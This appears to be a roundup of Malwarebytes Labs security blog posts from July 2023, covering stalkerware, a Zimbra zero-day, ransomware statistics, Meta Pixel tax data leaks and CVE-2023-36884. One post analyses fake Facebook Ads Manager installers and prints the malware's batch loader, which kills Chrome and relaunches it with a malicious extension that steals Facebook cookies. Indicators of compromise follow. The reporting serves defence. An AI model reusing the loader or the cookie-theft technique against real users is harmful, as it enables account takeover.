IT NEWS

Last week on Malwarebytes Labs:

• Tax preparation firms shared sensitive information with Meta
• Ransomware making big money through “big game hunting”
• Malwarebytes stops 100% of Advanced Threats in latest AV-Test assessment
• From Malvertising to Ransomware: A ThreatDown webinar recap
• Ransomware review: July 2023
• Zero-day deploys remote code execution vulnerability via Word documents
• How to secure your business before going on vacation
• Update now! Microsoft patches a whopping 130 vulnerabilities
• Proposed Massachusetts law to ban sale of your mobile location data
• Criminals target businesses with malicious extension for Meta’s Ads Manager and accidentally leak stolen accounts
• Apple issues Rapid Security Response for zero-day vulnerability
• “TootRoot” Mastodon vulnerabilities fixed: Admins, patch now!
• Threatening rogue finance apps removed from the Apple Store
• MOVEit Transfer fixes three new vulnerabilities
• Malwarebytes Browser Guard introduces three new features
• Warning issued over increased activity of TrueBot malware

Stay safe!

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The language of a data breach, no matter what company gets hit, is largely the same. There’s the stolen data—be it email addresses, credit card numbers, or even medical records. There are the users—unsuspecting, everyday people who, through no fault of their own, mistakenly put their trust into a company, platform, or service to keep their information safe. And there are, of course, the criminals. Some operate in groups. Some act alone. Some steal data as a means of extortion. Others steal it as a point of pride. All of them, it appears, take something that isn’t theirs. 

But what happens if a cybercriminal takes something that may have already been stolen? 

In late June, a mobile app that can, without consent, pry into text messages, monitor call logs, and track GPS location history, warned its users that its services had been hacked. Email addresses, telephone numbers, and the content of messages were swiped, but how they were originally collected requires scrutiny. That’s because the app itself, called LetMeSpy, is advertised as a parental and employer monitoring app, to be installed on the devices of other people that LetMeSpy users want to track. 

Want to read your child’s text messages? LetMeSpy says it can help. Want to see where they are? LetMeSpy says it can do that, too. What about employers who are interested in the vague idea of “control and safety” of their business? Look no further than LetMeSpy, of course.  

While LetMeSpy’s website tells users that “phone control without your knowledge and consent may be illegal in your country,” (it is in the US and many, many others) the app also claims that it can hide itself from view from the person being tracked. And that feature, in particular, is one of the more tell-tale signs of “stalkerware.” 

Stalkerware is a term used by the cybersecurity industry to describe mobile apps, primarily on Android, that can access a device’s text messages, photos, videos, call records, and GPS locations without the device owner knowing about said surveillance. These types of apps can also automatically record every phone call made and received by a device, turn off a device’s WiFi, and take control of the device’s camera and microphone to snap photos or record audio—all without the victim knowing that their phone has been compromised. 

Stalkerware poses a serious threat—particularly to survivors of domestic abuse—and Malwarebytes has defended users against these types of apps for years. But the hacking of an app with similar functionality raises questions. 

Today, on the Lock and Code podcast with host David Ruiz, we speak with the hacktivist and security blogger maia arson crimew about the data that was revealed in LetMeSpy’s hack, the almost-clumsy efforts by developers to make and market these apps online, and whether this hack—and others in the past—are “good.” 

“I’m the person on the podcast who can say ‘We should hack things,’ because I don’t work for Malwarebytes. But the thing is, I don’t think there really is any other way to get info in this industry.”

Tune in today. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use. 

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Security experts are warning Zimbra users that a vulnerability for which there is no patch is being actively exploited in the wild. In a security update about the vulnerability, the company offered a temporary workaround which users can apply while waiting for a patch to be created.

Zimbra is an open source webmail application used for messaging and collaboration. The vulnerability, which could impact the confidentiality and integrity of users’ data, exists in Zimbra Collaboration Suite Version 8.8.15.

Zimbra is widely used across different industries and government organizations. We reported about a cross-site scripting (XSS) zero-day vulnerability in the Zimbra email platform back in February 2022. At the time, Zimbra claimed there were 200,000 businesses, and over a thousand government and financial institutions, using its software. Thousands of Zimbra mail servers were backdoored in a large scale attack exploiting that vulnerability.

In our June 2023 ransomware review we noted how the MalasLocker ransomware group had targeted vulnerabilities in Zimbra servers, including CVE-2022-24682, to enable remote code execution (RCE). This resulted in MalasLocker taking first place on the list of known attacks over the month of May 2023, displacing perennial top-spot holder LockBit.

Since Zimbra mentions no further details, it is hard to determine what the exact problem is. Although the proposed fix (down below under Mitigation) suggest that there may be a problem which can be exploited by utilizing specially crafted XML files. By using the fn:escapeXml() function, which escapes characters that can be interpreted as XML markup, users will manually add input sanitization.

Zimbra makes no mention of active exploitation, but Google researcher Maddie Stone tweeted about another researcher in the Google Threat Analysis Group noticing the vulnerability being used in-the-wild in a targeted attack.

.@_clem1 discovered this being used in-the-wild in a targeted attack. Thank you to @Zimbra for publishing this advisory and mitigation advice! If you run Zimbra Collaboration Suite, please go manually apply the fix! #itw0days https://t.co/lqwt0kOFWA

— Maddie Stone (@maddiestone) July 13, 2023

Earlier vulnerabilities in Zimbra allowed cybercriminals to steal emails in targeted attacks against organizations in the European government and media sectors.

Mitigation

The Zimbra security update suggests you apply the follow fix manually on all of your mailbox nodes:

1. Take a backup of the file /opt/zimbra/jetty/webapps/zimbra/m/momoveto
2. Then open to edit the active file and go to line number 40
3. Change
   <input name="st" type="hidden" value="${param.st}"/>
   to
   <input name="st" type="hidden" value="${fn:escapeXml(param.st)}"/>

Zimbra notes that a service restart is not required so you can do it without any downtime.

We will keep you posted when a patch is made available and in case there are other developments around this bug.

We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Ransomware generates big money for the groups behind it, with new research confirming (some) of the scale of the problem. Chainalysis, a blockchain research firm, looked at data from monitored cryptocurrency wallets, concluding that around $449 million has been taken from victims in the last six months.

As The Record correctly notes, the actual figure will likely be significantly higher because only monitored wallets are included in the study. In terms of what’s going on out there, payments under $1,000 and above $100,000 are both on the up. It’s claimed that ransomware groups could pull in around $900 million in 2023, with the return of “big game hunting” being one of the key factors for the bump.

What is big game hunting? Well, this is the practice of targeting large, financially well-off corporations in order to secure the biggest possible payouts. Even with the increase in attacks on smaller companies, taking on the big entities is where the most enticing payouts are waiting to be had.

As an example of payout sizes, BlackBasta’s 2023 average payment size is $762,634 and its median is $147,106. Cl0p checks in with a $1,730,486 average and a $1,946,335 median. At the other end of the scale the smaller, less sophisticated deployments such as Phobos creep into view with a $1,719 average and a $300 median.

No matter the size of the payment, they are ultimately securing said payments and continuing to make bank. It’s also suspected that as more firms refuse to pay their extortionists, so too are the ransomware authors responding by increasing their ransom demands. The research also notes that additional tactics are being used in cases of non payment to up the ante further. Threats to leak data, sell it online, break other parts of the business, attack related firms, or even harass employees are all tactics ransomware authors can make use of.

It’s not all doom and gloom where cryptocurrency payments are concerned. With the notable exception of ransomware, cryptocurrency crime across 2023 is in “sharp decline”. Cryptocurrency businesses are getting a handle on scams, users new and old are learning about how to protect their investments, and law enforcement pressure on cryptocurrency fraud is likely having an impact.

Back in the realm of ransomware, things aren’t perhaps quite as good with some of the big hitters from our June ransomware review serving up exploits, dubious “charity donation” requests, and an increase in attacks on education.

Elsewhere, we have students being used to apply pressure to impacted organisations and relentless attacks on schools. It would be unwise to think the scale of ransomware’s day to day impact is in any danger of dropping off anytime soon.

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

A group of seven US senators has sent a letter to the heads of the IRS, the Department of Justice, the Federal Trade Commission and the IRS watchdog, revealing that they have found evidence that reveals “a shocking breach of taxpayer privacy by tax prep companies and by Big Tech firms.”

According to the letter, information about tens of millions of US taxpayers was sent by three tax preparation firms to social media giant Meta. The letter asked the agencies to immediately open an investigation.

The tax firms used Pixel code on their websites to track and improve their media campaigns. Pixel is an integral part of Meta’s tracking infrastructure which collects data about people online. Data which is eventually used for targeted advertising, tailored content recommendations, and to train its algorithms.

The Pixel code is freely available and designed to help both the website owner and Meta. The code gathered information like names and email addresses, but also more detailed information, including data on users’ income, filing status, refund amounts, and dependents’ college scholarship amounts.

Despite what you might expect, it doesn’t matter whether the person using the tax filing service has an account on Facebook or other platforms operated by Meta.

One of the tax preparation firms stated that they used the Meta Pixel to deliver a more personalized experience for their customers.

“We did NOT know and were never notified that personal tax information was being collected by Facebook from the Pixel.”

Meta, on the other hand stated that it feels it has been clear in its policies that advertisers should not send sensitive information about people through its business tools.

“Doing so is against our policies and we educate advertisers on properly setting up Business tools to prevent this from occurring. Our system is designed to filter out potentially sensitive data it is able to detect.”

With both sides agreeing that this should not have happened, we wholeheartedly agree, but it does not explain why it happened anyway.

The problem was flagged earlier by the Markup. We reported about their Pixel Hunt project in January of 2022. The Markup also found Google’s analytics tool on one of the tax preparator’s  websites, but that didn’t send out any names, although it did send some of the financial information to Google.

The three tax preparation firms mentioned in the letter are H&R Block, TaxAct, and TaxSlayer. The information gathered on the websites of these firms has been sent to Meta over the course of at least two years.

If you don’t want your information to be gathered and shared by trackers, you can use solutions like Malwarebytes Browser Guard, a browser extension that, among others, blocks third-party ad trackers.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

AV-TEST, a leading independent tester of cybersecurity solutions, has just given Malwarebytes two Advanced awards for the ability of our consumer and business products to protect against the latest attack techniques.

Let’s take a deeper dive into the test and the results.

Advanced Threat Protection test breakdown

AV-Test’s bi-monthly Advanced Threat Protection exam scrutinizes Windows 11 security products, testing their ability to counter new attack methods.

In the April 2023 trial, they assessed defenses against the “Inline Execute Assembly” technique used by data stealers and ransomware. The test involved 10 malware samples sent via spearphishing emails. If not caught early, data stealers could siphon off data, and ransomware could start encrypting data, while communicating with a C2 server. 

Points were given for detecting key attack phases, with a perfect score being 35 points.

In the latest results, both Malwarebytes Premium and Malwarebytes Endpoint Protection aced the test, earning the top “Advanced” rating for detecting 10/10 samples and receiving the full 35/35 points.

Check out the full results: https://www.av-test.org/en/news/advanced-threat-protection-against-the-latest-data-stealers-and-ransomware-techniques/

Advanced test: Enterprise results

Malwarebytes Endpoint Protection successfully detected and blocked all ten instances of malware (5 data stealers and 5 ransomware samples) sent via spearphishing emails in the initial two steps—when they first landed on the system and when they attempted to become active—thereby passing all tests in these phases.

Advanced test: Consumer results

Malwarebytes Premium fared no differently, having also successfully detected and blocked all ten instances of malware when they first landed on the system and attempted to become active.

The foundation for superior Endpoint Detection and Response (EDR)

Malwarebytes Endpoint Protection (EP) is not merely a standalone product; it’s the bedrock of our Malwarebytes Endpoint Detection and Response (EDR) solution.

Leveraging the robust detection and prevention capabilities validated by AV-Test, Malwarebytes EDR constantly monitors endpoint systems and automatically kills processes associated with advanced threat activity. Learn more about our endpoint security solutions.

GET A FREE BUSINESS TRIAL

Learn more about what experts and customers are saying about Malwarebytes:

Malwarebytes recognized as endpoint security leader by G2

MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks

Malwarebytes receives highest rankings in recent third-party tests

Malwarebytes outperforms competition in latest MRG Effitas assessment

An unpatched zero-day vulnerability is currently being abused in the wild, targeting those with an interest in Ukraine. Microsoft reports that CVE-2023-36884 is tied to reports of:

…a series of remote code execution vulnerabilities impacting Windows and Office products. Microsoft is aware of targeted attacks that attempt to exploit these vulnerabilities by using specially-crafted Microsoft Office documents. An attacker could create a specially crafted Microsoft Office document that enables them to perform remote code execution in the context of the victim. However, an attacker would have to convince the victim to open the malicious file.

While the CVE is being updated with new information and links to appropriate security information, the Microsoft Security Blog is currently exploring the issue in detail.

This all ties back to a phishing campaign operated by a group being tracked as “Storm-0978” which targets defence and government entities in both Europe and North America. The campaign itself makes use of bait related to the Ukrainian World Congress, a non-profit organisation of “all Ukrainian public organisations in diaspora”.

These infections originate from remote code execution via Word documents exploiting the above Ukraine-themed bait, as well as an “abuse of vulnerabilities contributing to a security feature bypass”. A fake OneDrive loader delivers a backdoor with similarities to RomCom, their primary backdoor tool. It’s unusual to observe websites involved in this kind of attack still be online hours after a reveal, but here are some shots we took of both site and downloads (thanks to Jerome):

Some of the other attacks launched by this group involve distribution of trojanized versions of popular software. Once the backdoor has taken hold, the group “may steal credentials to be used in targeted operations”.

Popular tools used for these installations include trojanized versions of Solarwinds Network Performance Monitor, KeePass, Signal, and Adobe products. Bogus domains imitating the real thing are registered and used as convincing fronts for the infected software.

Microsoft notes that this group also has a hand in ransomware attacks, though it is less targeted in nature and unrelated to any espionage-themed operations. Attacks which have been identified as belonging to Storm-0978 in this realm have impacted finance and telecommunications industries.

A variety of attacks on several fronts, then. 

Microsoft gives the following advice for organisations concerned with the potential threat of compromise from the most recent attacks:

CVE-2023-36884 specific recommendations

• Customers who use Microsoft Defender for Office 365 are protected from attachments that attempt to exploit CVE-2023-36884.
• In current attack chains, the use of the Block all Office applications from creating child processes attack surface reduction rule prevents the vulnerability from being exploited
• Organizations who cannot take advantage of these protections can set the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry key to avoid exploitation.  Please note that while these registry settings would mitigate exploitation of this issue, it could affect regular functionality for certain use cases related to these applications.

You could also consider blocking outbound SMB traffic.

We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

This article is based on research by Marcelo Rivero, Malwarebytes’ ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, “known attacks” are those where the victim did not pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher.

Following a three-month lull of activity, Cl0p returned with a vengeance in June and beat out LockBit as the month’s most active ransomware gang. The group’s 91 attacks come not long after their extensive GoAnywhere campaign in March, when they hit over 100 organizations using a nasty zero-day.

June also witnessed a staggering increase in attacks from relatively new gangs such as Akira (26) and 8Base (41), enough to propel both of them into the top five—a designation usually reserved for more familiar names like ALPHV, who was conspicuously silent in June. 

Other big stories in June include a suspected LockBit affiliate arrest, the Royal ransomware gang toying with a new encryptor, and a notable increase in attacks on the Manufacturing sector.

Comparing June to the earlier months of the year, we notice several shifts in ransomware activity. There was a massive decrease in the activity from Royal, for example, which normally dominates the monthly rankings—often cracking into the top five—with an average of roughly 30 attacks a month in that period. But last month, they posted just two victims. 

While a sudden dip in attacks isn’t too unusual for top ransomware gangs, it’s worth mentioning that in last month’s review we speculated that Royal might be going through a rebrand. That’s because a new ransomware called BlackSuit had appeared which shared 98 percent of its code with the infamous Royal ransomware.

Considering that both Royal and BlackSuit were active last month, however, a rebrand probably isn’t happening any time soon. Instead, it’s likely that Royal is simply testing a new encryptor—especially considering that BlackSuit was used in just two attacks last month—and that this lull can be explained as more or less of a research period for them.

Other interesting anomalies in June include 47 attacks on the Manufacturing industry (which usually averages around 20 attacks a month) and notable increases in attacks on Switzerland (14) and Brazil (13), both of which are normally attacked only two or three times a month. Part of this can be explained by the fact that 8BASE disproportionately attacked Brazil with 11 attacks last month, while PLAY focused on Switzerland (5).

Known ransomware attacks by country, June 2023

Cl0p’s precipitous rise to the top of the charts this month, on the other hand, can be explained by their exploitation of a zero-day in MOVEit Transfer, a widely used file transfer software.

The vulnerability, which could allow attackers to gain escalated privileges and unauthorized access to an environment, was first disclosed on May 31st in a security bulletin released by Progress. But while it was clear earlier on that attackers were actively exploiting CVE-2023-34362, it was only a few days later that it became clear that Cl0p was behind the attacks. A Cl0p representative confirmed that they had been testing the vulnerability since July 2021 and that they had decided to deploy it over the Memorial Day weekend. What’s more, two other vulnerabilities in MOVEit were found while new victims were still coming forward.

In terms of the fallout, it’s tough to overstate the havoc Cl0p was able to wreck thanks to the zero-day.

The MOVEit data breaches had widespread impacts, affecting everything from the Oregon DMV and Louisiana OMV (Office of Motor Vehicles)—including the leak of nearly 10 million drivers’ licenses—to the University of Rochester and multiple corporations. PBI Research Services also reported a data breach that exposed information for 4.75 million people. The government even offered a reward of up to $10 million for information on Cl0p after several federal agencies in the US fell victim to the gang.

LockBit 

LockBit reportedly squeezed about $91 million out of US organizations with around 1,700 attacks since 2020, according to a June report by CISA. As confirmed by our own research data, CISA also found LockBit took the top spot as the biggest global ransomware threat in 2022.

As for who was hit the hardest, around 16 percent of ransomware incidents affecting State, Local, Tribal, and Tribunal (SLTT) governments were from LockBit, says the MS-ISAC.

In other news, a suspected LockBit affiliate named Ruslan Magomedovich Astamirov, a 20-year-old from the Chechen Republic, was arrested in Arizona last month. The US Justice Department thinks he’s been deploying LockBit ransomware on victim networks both in the States and overseas, with the investigation having run from August 2020 through March 2023.

Astamirov is now facing charges of wire fraud and of intentionally damaging protected computers, plus he’s accused of making ransom demands through deploying ransomware. The arrest makes him the third LockBit affiliate charged in the US since November.

Newcomers

NoEscape

NoEscape is a new ransomware which been doing the rounds in underground forums since May 2023. Developed in-house using C++, the NoEscape ransomware uses a hybrid approach to encryption, combining ChaCha20 and RSA encryption algorithms for file encryption and key protection.

Last month, NoEscape posted 7 victims on their leak site.

Darkrace

DarkRace is a new ransomware group first discovered by researcher S!Ri. Darkrace specifically targets Windows operating systems and has several similarities to LockBit.

The gang attacked 10 victims last month, the majority of them being from the Information and Communications Technology (ICT) sectors. Geographically, most victims are located in Europe, specifically Italy. 

Rhysida

Rhysida, a new ransomware gang claiming to be a “cybersecurity team,” has been in operation since May 17, 2023, making headlines for their high-profile attack against the Chilean Army. 

The gang published a whopping eighteen victims on their leak site in June, making it one of the most prolific newcomers in our month reviews to-date.

Our recent webinar From Malvertising to Ransomware highlight the clear connection between malvertising—the practice of embedding malicious code within legitimate online advertisements—and the epidemic of ransomware attacks affecting businesses globally.

Presented by Mark Stockley, security evangelist at Malwarebytes, and Jerome Segura, Director of Threat Intelligence at Malwarebytes, the webinar explains how malvertising has evolved into an effective entry point in the cyberattack “kill chain.”

By leveraging the broad reach and precision targeting of digital advertising, threat actors can compromise systems, gather valuable credentials, and ultimately lay the groundwork for debilitating ransomware attacks. Speakers mention the Royal ransomware group as just one example of a threat actor using this tactic.

Toward the end of the webinar, the speakers provide a set of tips for protecting businesses from these attacks, including the importance of tools such as Endpoint Detection and Response (EDR) and Managed Detection and Response (MDR) in combatting them.

If you missed the live session, it’s not too late to get the low-down on the malvertising-ransomware connection. Watch the full webinar here to ensure you’re informed and prepared to tackle these nasty threats!

Watch the webinar 

Like all social media platforms, Facebook constantly has to deal with fake accounts, scams and malware. We have written about scams targeting consumers that redirect to fake Microsoft alert pages, but there are also threats targeting businesses that use Facebook to promote their products and services.

In the past few weeks, there’s been a resurgence in sponsored posts and accounts that impersonate Meta/Facebook’s own Ads Manager. Crooks are promising better advertising via optimization, and increased performance when you use their (malware-laden) software. Meta has tracked and analyzed several threat actors such as DuckTail that have been active for a number of years with a particular interest for Facebook advertising accounts.

Now, we’ve discovered a new attack that uses malicious Chrome extensions to steal Facebook account credentials and is not related to the DuckTail malware. While tracking this campaign, we noticed the threat actors made a mistake when they packaged one of the malware files with their own stolen data.

We have passed the information about this campaign and the threat actors to Meta and thank it for taking prompt action following our reporting.

Key takeaways

• Vietnamese threat actors are actively targeting Facebook business accounts
• Victims are lured via fake Ads Manager software promoted on Facebook
• Malicious Google Chrome extensions are used to steal and extract login information
• Over 800 victims worldwide, 310 in the US
• More than $180K in compromised ad budget

Fake Ads Manager accounts

Ads Manager is the product that enables users to run online ads on Facebook, Instagram and other platforms owned by Meta. An article in TechCrunch from May describes how scammers were buying ads from Meta via verified accounts. They were trying to entice potential victims into downloading software to manage their advertising via a “more professional and secure tool”.

In early June, we identified fraudulent accounts running the same scam using similar lures. It is also worth noting that these accounts often have tens of thousands of followers and any of their posts can quickly become viral. Scammers are primarily targeting business users who may spend ad dollars on the platform.

In order to compromise those accounts, they first need to redirect potential victims onto external websites. We’ve seen several different domains that are essentially phishing pages using the Meta logo and branding. The lure is the Facebook Ads Manager program that is pushed via a download link. We’ve seen various cloud providers abused to host these password-protected RAR archives ranging from Google to Trello, as seen below.

Malicious Chrome extension

Once extracted from the archive, the file is an MSI installer package that installs several components under C:Program Files (x86)Ads ManagerAds Manager. We can see a batch script (perhaps named after Google Bard), and two folders. One of them is for a custom Chrome extension while the System folder contains a standalone WebDriver file.

The batch script is launched after the MSI installer completes and essentially spawns a new browser window launched with the custom extension from that previous installation path, pointing the victim to the Facebook login page.

taskkill /F /IM chrome.exe
taskkill /F /IM chromedriver.exe
timeout /t 1 >nul
start chrome.exe --load-extension="%~dp0/nmmhkkegccagdldgiimedpiccmgmiedagg4" "https://www.facebook.com/business/tools/ads-manager"

That custom extension is cleverly disguised as Google Translate and is considered ‘Unpacked’ because it was loaded from the local computer, rather than the Chrome Web Store. A quick look at its source code reveals immediate hex obfuscation in an attempt to hide what it is actually doing.

After reverse engineering this extension, it became quite clear that it had nothing to do with Google Translate. In fact, the code is entirely focused on Facebook and grabbing important pieces of information that could allow an attacker to log into accounts. We can see that the threat actors are interested in Facebook cookies which they request via the cookies.getAll method.

We also notice an interesting way to exfiltrate that data by using Google Analytics. This technique was previously documented by HUMAN as a way to bypass CSP.

Accidental leak

In total, we identified over 20 different malicious Facebook Ad Manager archives that installed Chrome extensions or instead went with traditional malware executables. While there are variations between samples, the attackers’ main goal appears to be the same, namely to collect Facebook business accounts.

While investigating a new phishing site, we saw an archive for download that looked quite different from the others. Ironically, it seems like the threat actors made a mistake and instead of putting the payload, they leaked their own stolen data, or rather the data they stole from victims.

The site we came across pretends to be Meta Ads Manager and boasts the same claims of increasing ad performance that we’ve seen before. There is a button to download a file called Meta Ads Manager.rar which is hosted on Google Drive.

However, this archive does not contain the expected MSI installer, but instead several text files that were last modified on June 15:

While the file names are self-explanatory, we can see that they contain information about authentication (checkpoint, cookie, token). There is also information about the threat actor who shared this file (file owner) via Google Drive and their Gmail email address (this information has been passed to Meta for further action).

The first row of the file called List_ADS_Tach.txt contains column headers with some names in Vietnamese, confirming the nationality of the individuals behind these attacks. In total, there are 828 rows, which translates into just as many Facebook accounts that were breached.

As expected, the threat actors are particularly interested in their victims’ advertising accounts. We can see different metrics related to ad budget (column titles were translated from Vietnamese and may be slightly inaccurate) as well as currencies:

Prized accounts will be those that have a large remaining balance for ad spend. While we do not know if this threat actor is directly associated with DuckTail, they have the same motives of financial profit from hacked Facebook business accounts.

Finally, by converting the data into a map, we can see that victims are not confined to a particular geolocation, in fact they are distributed worldwide.

The threat actors realized their mistake a few days later and trashed the file from their Google Drive account. They also updated the download link on the phishing site, with a new file hosted via MediaFire (fortunately for users, the file was detected as malware and the download is blocked).

A low cost, high yield threat

Business users may be tempted to optimize their ad campaigns on Facebook by clicking on certain posts and downloading programs that claim to increase their earnings. This is, however, a very dangerous practice even if (or especially if) the instructions claim that the software is secure and free of malware. Remember that there is no silver bullet and anything that sounds too good to be true may very well be a scam in disguise.

Fraudsters have a lot of time of their hands and spend years studying and understanding how to abuse social media and cloud platforms, where it is a constant arm’s race to keep bad actors out. Based on reports highlighted in TechCrunch’s recent article, the threat actors may also reinvest some of the stolen ad budgets to place out malicious ads to ensnare more victims and perpetuating this cycle.

If you did happen to download one of those malicious Facebook Ad Manager installers, Malwarebytes has your back. We were already picking up several components from these campaigns and have added additional protection for optimal detection coverage. Victims will also want to revoke access to unknown users from their Business Manager account profile that the fraudsters may have added, as well as review their transactions history.

We would like to thank Meta for being receptive to our report and helping to keep users safe.

Indicators of Compromise

Decoy site

fbadmanage[.]info

RAR archives (password 888 or 999)

e73f53ea5dca6d45362fef233c65b99e5b394e97f4f2fe39b374e49c6a273e60
2082e4a8cd0495aabb0f72a41224f134214d0959e208facbfe960c8c74166cda
3638702c83364fc625c0f91388e9b06d94c3486ac0357038f66667d05f9c52e6
547955e97c945ad7283e1637ec0f5e2dbf13c7fb4885a854fb0744542579c6ff
587698e967d05a649428d3a4e45fd64fcea18affd5b021f15d01b8a39a244f8a
6719e6ba89b0a59d325f4531432195afe65154c1d63b9c3bab8ad8925f2f911d
72ba4254e94b7308de92652d1aaf29084fae55d01e0643df1050a638a3bd9dc8
76731d0ed28a552c6f673b6c3e1b08c0499d4b44050df6838439055e01990406
81d9bc3eabe578d606787ab191dd0ff7e8f58a06e35813591e17855daef8505b
8564962190135783b2f21c64cc05fdb226a89a7cbd309ca353fcc31a2a669f0e
8a6a2d439e537b5985b7492f0dded6ae3e1e80133c073d09849712c08927ca55
99057370f8c0312bb5b4a7ed0bd3753b60488e71576af210edd7f813514acb55
a29131934b589eb325a76c7d638ac3a0a55c5f185189c71cdf79d8d662129fb7
b146d19f7ea988f36449463931758935a54b58e1052dd3a5d20060b2e991b1da
c3704b2250e0e8663c86ad5a63e1051004d6967827ef90aab553ddfce682ca5a
c9f0da6aa38d4c3d38dc734d7937cdac47c272cca3e2df030242854a9661d314
d43d288368bad68e600dae08db5e4846adcaeb4a7d1902ab76417fca3f4c0cf7
e94b66b1a3f27dc282a451d3820b3d3d8380be9b9ebab04eedcf4bb0020908e8
f128cbfddf3d5c2f5742d3d5d5dae1a041023eba543ee2ddf4d8afdbd42f29b3
f1b14728d9f42def90e6eec8c32b2ef5eef43e73383eefa70bf70d8be953c3e5
f9ccac29307547adbf779338d6f22bde128feea847012f6392d7ef69cab30878

Analyzed MSI file

fd637520a9ca34f7b4b21164581a4ec498bf106ba168b5cb9fcd54b5c2caafd0

Malwarebytes EDR and MDR remove all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW